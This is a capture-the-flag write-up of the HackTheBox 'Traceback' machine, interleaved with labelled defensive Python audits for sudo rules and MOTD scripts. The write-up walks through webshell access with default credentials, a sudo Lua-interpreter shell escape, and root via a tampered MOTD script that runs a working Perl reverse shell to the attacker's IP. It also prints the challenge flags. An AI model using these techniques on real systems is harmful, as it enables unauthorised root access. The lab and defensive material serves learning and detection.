HackTheBox - Traceback

Information gathering:


kali@kali:~$ nmap -v -A 10.10.10.181
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-25 04:49 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Initiating Ping Scan at 04:49
Scanning 10.10.10.181 [2 ports]
Completed Ping Scan at 04:49, 0.16s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:49
Completed Parallel DNS resolution of 1 host. at 04:49, 2.31s elapsed
Initiating Connect Scan at 04:49
Scanning 10.10.10.181 [1000 ports]
Discovered open port 80/tcp on 10.10.10.181
Discovered open port 22/tcp on 10.10.10.181
Completed Connect Scan at 04:49, 6.90s elapsed (1000 total ports)
Initiating Service scan at 04:49
Scanning 2 services on 10.10.10.181
Completed Service scan at 04:49, 6.35s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.181.
Initiating NSE at 04:49
Stats: 0:00:18 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 2 (1 waiting)
NSE Timing: About 99.27% done; ETC: 04:49 (0:00:00 remaining)
Stats: 0:00:19 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 2 (2 waiting)
NSE Timing: About 99.27% done; ETC: 04:49 (0:00:00 remaining)
Stats: 0:00:19 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 2 (2 waiting)
NSE Timing: About 99.27% done; ETC: 04:49 (0:00:00 remaining)
Stats: 0:00:19 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 99.63% done; ETC: 04:49 (0:00:00 remaining)
Stats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 99.63% done; ETC: 04:49 (0:00:00 remaining)
Stats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 99.63% done; ETC: 04:49 (0:00:00 remaining)
Stats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 99.63% done; ETC: 04:49 (0:00:00 remaining)
Completed NSE at 04:49, 4.84s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.66s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Nmap scan report for 10.10.10.181
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.74 seconds

The Nmap scan didn't turn up anything particularly useful, so I searched for possible ways in. Apache 2.4.29 has a known local privilege escalation that can be exploited.

Back to the home page. Right-click and view the page source: the author hints that a webshell backdoor was left behind.

Through some social engineering I found that the author has a webshell project. Sure enough, it worked.

Username: admin, password: admin. Logged in successfully.

This webshell is quite powerful: it can return a shell automatically. At this point I had webadmin privileges.

After logging in, I found:
$ whoami
webadmin
$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
$ 
Lua scripts can be executed with sysadmin privileges, so I wrote a script like this:

echo "os.execute('/bin/sh')" > fuckme.lua
sudo -u sysadmin /home/sysadmin/luvit /home/webadmin/fuckme.lua

That gave me sysadmin privileges.

$ sudo -u sysadmin /home/sysadmin/luvit /home/webadmin/hack.lua
sh: turning off NDELAY mode
whoami
sysadmin
cd /home
ls a
ls: cannot access 'a': No such file or directory
ls -al
total 16
drwxr-xr-x  4 root     root     4096 Aug 25  2019 .
drwxr-xr-x 22 root     root     4096 Aug 25  2019 ..
drwxr-x---  5 sysadmin sysadmin 4096 Mar 16 03:53 sysadmin
drwxr-x---  5 webadmin sysadmin 4096 Apr 23 07:56 webadmin
cd sysadmin
ls -al
total 4336
drwxr-x--- 5 sysadmin sysadmin    4096 Mar 16 03:53 .
drwxr-xr-x 4 root     root        4096 Aug 25  2019 ..
-rw------- 1 sysadmin sysadmin       1 Aug 25  2019 .bash_history
-rw-r--r-- 1 sysadmin sysadmin     220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin    3771 Apr  4  2018 .bashrc
drwx------ 2 sysadmin sysadmin    4096 Aug 25  2019 .cache
drwxrwxr-x 3 sysadmin sysadmin    4096 Aug 24  2019 .local
-rw-r--r-- 1 sysadmin sysadmin     807 Apr  4  2018 .profile
drwxr-xr-x 2 root     root        4096 Aug 25  2019 .ssh
-rwxrwxr-x 1 sysadmin sysadmin 4397566 Aug 24  2019 luvit
-rw------- 1 sysadmin sysadmin      33 Apr 23 07:44 user.txt
cat user.txt
24307597bac31dff3123ff294c2583d4
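As an added defensive check (my own code, not part of the original writeup), the following Python audits `sudo -l` output together with an `ls -l` listing of the target's directory and flags exactly the properties that make the rule above dangerous: NOPASSWD, a script interpreter as the target (luvit is a Lua runtime), a target that lives under a home directory, and a target that is not root-owned or is group-writable (luvit is -rwxrwxr-x sysadmin:sysadmin in the listing). The sample input is constructed from the output shown above; the function and variable names are mine.

```python
import re
import stat

# Runtimes that execute whatever script they are handed: a sudo rule that
# points at one of these hands the caller the run-as user's full privileges.
INTERPRETERS = {"luvit", "lua", "perl", "python", "python3", "ruby", "node", "php", "sh", "bash"}

# One rule line of `sudo -l`, e.g. "    (sysadmin) NOPASSWD: /home/sysadmin/luvit"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

# One line of `ls -l`: perms, links, owner, group, size, month, day, year-or-time, name
LS_RE = re.compile(
    r"^[-dl](?P<perm>[rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<name>.+)$"
)


def parse_sudo_l(text):
    """Return (runas, tags, command) tuples from the 'may run' section of `sudo -l` output."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            tags = {t.rstrip(":") for t in m.group("tags").split()}
            rules.append((m.group("runas"), tags, m.group("cmd").strip()))
    return rules


def parse_ls_line(line):
    """Turn one `ls -l` line into (name, owner, group, mode bits) for the permission checks."""
    m = LS_RE.match(line)
    if not m:
        raise ValueError("not an ls -l line: " + line)
    mode = 0
    for i, ch in enumerate(m.group("perm")):
        if ch in "rwxst":          # lowercase s/t means the x bit is set as well
            mode |= 1 << (8 - i)
    return m.group("name"), m.group("owner"), m.group("group"), mode


def audit_rule(runas, tags, command, files):
    """Findings for one sudo rule; `files` maps an absolute path to (owner, group, mode)."""
    findings = []
    exe = command.split()[0]
    if "NOPASSWD" in tags:
        findings.append("NOPASSWD: no password is needed to use this rule")
    if exe.rsplit("/", 1)[-1] in INTERPRETERS:
        findings.append(f"{exe} is a script interpreter: any script supplied to it runs as {runas}")
    if exe.startswith("/home/"):
        findings.append("target lives under a home directory rather than a root-owned system path")
    if exe in files:
        owner, group, mode = files[exe]
        if owner != "root":
            findings.append(f"target is owned by {owner}, who can replace it at will")
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(f"target is writable by group {group} or by everyone")
    return findings


def audit_sudo_output(sudo_text, ls_lines, directory):
    """Audit every rule in `sudo_text`, resolving targets against `ls -l` lines from `directory`."""
    files = {}
    for line in ls_lines:
        name, owner, group, mode = parse_ls_line(line)
        files[directory.rstrip("/") + "/" + name] = (owner, group, mode)
    return {cmd: audit_rule(runas, tags, cmd, files) for runas, tags, cmd in parse_sudo_l(sudo_text)}


# Constructed sample input, modelled on the `sudo -l` and `ls -al` output shown above.
SAMPLE_SUDO_L = """\
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
"""
SAMPLE_LS = [
    "-rwxrwxr-x 1 sysadmin sysadmin 4397566 Aug 24  2019 luvit",
    "-rw------- 1 sysadmin sysadmin      33 Apr 23 07:44 user.txt",
]

if __name__ == "__main__":
    for cmd, findings in audit_sudo_output(SAMPLE_SUDO_L, SAMPLE_LS, "/home/sysadmin").items():
        print(cmd)
        for finding in findings:
            print("  -", finding)
```

On a real host the same functions can be fed the live output of `sudo -l` and `ls -l` of the rule's directory; a rule that produces no findings (root-owned, non-writable, non-interpreter target, password required) is the shape a sudo delegation should have.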


But is sysadmin enough? Of course not!!!

sysadmin@traceback:/tmp$ service --status-all
 [ + ]  apache-htcacheclean
 [ + ]  apache2
 [ + ]  apparmor
 [ - ]  console-setup.sh
 [ + ]  cron
 [ + ]  dbus
 [ + ]  grub-common
 [ - ]  hwclock.sh
 [ + ]  irqbalance
 [ - ]  keyboard-setup.sh
 [ + ]  kmod
 [ + ]  open-vm-tools
 [ - ]  plymouth
 [ - ]  plymouth-log
 [ + ]  procps
 [ - ]  rsync
 [ + ]  rsyslog
 [ + ]  ssh
 [ + ]  udev
 [ + ]  ufw
 [ - ]  uuidd
 [ - ]  x11-common

sysadmin@traceback:/tmp$  uname -a
Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

After some searching I found that the kernel could be exploited for privilege escalation, but gcc isn't installed, so that route couldn't be used.

In the end, because of this banner line, I turned my attention to the SSH service:
kali@kali:~$ ssh sysadmin@10.10.10.181
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
Finally, by checking the process list, I found a cron job that automatically overwrites the SSH login (MOTD) configuration files:

root       7023  0.0  0.0  58792  3100 ?        S    00:49   0:00 /usr/sbin/CRON -f
root       7025  0.0  0.0   4628   784 ?        Ss   00:49   0:00 /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/



This is the line I appended to the MOTD script; it runs a Perl reverse shell placed in /tmp:

/usr/bin/perl /tmp/1.pl 10.10.14.58 1234

#!/usr/bin/perl
use Socket;
$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");
$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system('/bin/sh -i');
close(STDIN);
close(STDOUT);
close(STDERR);

sysadmin@traceback:/etc/update-motd.d$ ls
00-header  10-help-text  50-motd-news  80-esm  91-release-upgrade
sysadmin@traceback:/etc/update-motd.d$ nano 00-header 
sysadmin@traceback:/etc/update-motd.d$ pwd
/etc/update-motd.d


[ -r /etc/lsb-release ] && . /etc/lsb-release

/usr/bin/perl /tmp/1.pl 10.10.14.58 1234  

echo "\nWelcome to Xh4H land \n"
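Two checks a defender would run on this host, added here as an example and not part of the original writeup: the scripts under /etc/update-motd.d are executed as root at every SSH login, so nothing but root should be able to write them, and a line that launches an interpreter with an IP address argument or references a file under /tmp is a red flag in such a script. The Python below scans a script's text for such lines, checks ownership and mode bits, and diffs a live script against a pristine copy in a backup directory (the same idea as the cron job shown above, used for detection rather than restoration). The sample scripts are constructed from the 00-header content shown above; the function names and the backup_dir parameter are my own.

```python
import os
import re
import stat

# Things that have no business in a MOTD script, which is run as root on every login.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\b(?:perl|python3?|ruby|php|nc|ncat|socat|bash|sh)\b.*\b\d{1,3}(?:\.\d{1,3}){3}\b"),
     "interpreter or network tool invoked with an IP address argument"),
    (re.compile(r"(?:^|[\s=\"'])/(?:tmp|var/tmp|dev/shm)/"),
     "references a file in a world-writable temp directory"),
    (re.compile(r"/dev/(?:tcp|udp)/"),
     "bash network redirection"),
]


def scan_motd_script(text):
    """Return (line_no, reason, line) for every non-comment line that matches a suspicious pattern."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        for pattern, reason in SUSPICIOUS_PATTERNS:
            if pattern.search(s):
                findings.append((no, reason, s))
    return findings


def check_ownership(mode, uid):
    """Ownership problems for a script root will execute: only root should be able to write it."""
    issues = []
    if uid != 0:
        issues.append("not owned by root")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        issues.append("writable by group or others")
    return issues


def added_lines(backup_text, live_text):
    """Non-blank lines present in the live script but absent from the pristine copy."""
    baseline = set(backup_text.splitlines())
    return [line for line in live_text.splitlines() if line.strip() and line not in baseline]


def audit_motd_dir(path="/etc/update-motd.d", backup_dir=None):
    """Live-host check: stat and scan every script, optionally diffing against a backup directory."""
    report = {}
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        st = os.stat(full)
        with open(full, errors="replace") as fh:
            live = fh.read()
        entry = {"ownership": check_ownership(st.st_mode, st.st_uid),
                 "content": scan_motd_script(live)}
        backup = os.path.join(backup_dir, name) if backup_dir else None
        if backup and os.path.isfile(backup):
            with open(backup, errors="replace") as fh:
                entry["added"] = added_lines(fh.read(), live)
        report[name] = entry
    return report


# Constructed samples: the tampered 00-header shown above, and what a clean copy would look like.
SAMPLE_TAMPERED = """\
#!/bin/sh
[ -r /etc/lsb-release ] && . /etc/lsb-release

/usr/bin/perl /tmp/1.pl 10.10.14.58 1234

echo "\\nWelcome to Xh4H land \\n"
"""
SAMPLE_CLEAN = """\
#!/bin/sh
[ -r /etc/lsb-release ] && . /etc/lsb-release

echo "\\nWelcome to Xh4H land \\n"
"""

if __name__ == "__main__":
    for no, reason, line in scan_motd_script(SAMPLE_TAMPERED):
        print(f"line {no}: {reason}: {line}")
    print("added since backup:", added_lines(SAMPLE_CLEAN, SAMPLE_TAMPERED))
    print("mode 0664 owned by uid 1000:", check_ownership(0o664, 1000))
```

Run `audit_motd_dir("/etc/update-motd.d", "/var/backups/.update-motd.d")` as root on a live host to get the same three checks for every script; the mode check is the one that would have mattered here, because a restore-every-30-seconds cron job does not help if the files it restores can be rewritten by a non-root user in between.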



kali@kali:~$ sudo nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.58] from (UNKNOWN) [10.10.10.181] 37218
/bin/sh: 0: can't access tty; job control turned off
$ ^C
kali@kali:~$ sudo nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.58] from (UNKNOWN) [10.10.10.181] 37302
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cd /root/
# ls
root.txt
# cat root.txt
ed41a5a0fe9b304a2450aeb362c12ead
# 


Finally, I successfully logged in via SSH as root.

kali@kali:~$ ssh -i ~/.ssh/id_rsa root@10.10.10.181
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land 



Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Fri Jan 24 03:43:29 2020
root@traceback:~# whoami
root
root@traceback:~# ifconfig
ens33: flags=4163  mtu 1500
        inet 10.10.10.181  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:feb9:a22b  prefixlen 64  scopeid 0x0
        inet6 fe80::250:56ff:feb9:a22b  prefixlen 64  scopeid 0x20
        ether 00:50:56:b9:a2:2b  txqueuelen 1000  (Ethernet)
        RX packets 22735  bytes 1912331 (1.9 MB)
        RX errors 0  dropped 128  overruns 0  frame 0
        TX packets 22021  bytes 4632098 (4.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 9811  bytes 776291 (776.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 9811  bytes 776291 (776.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

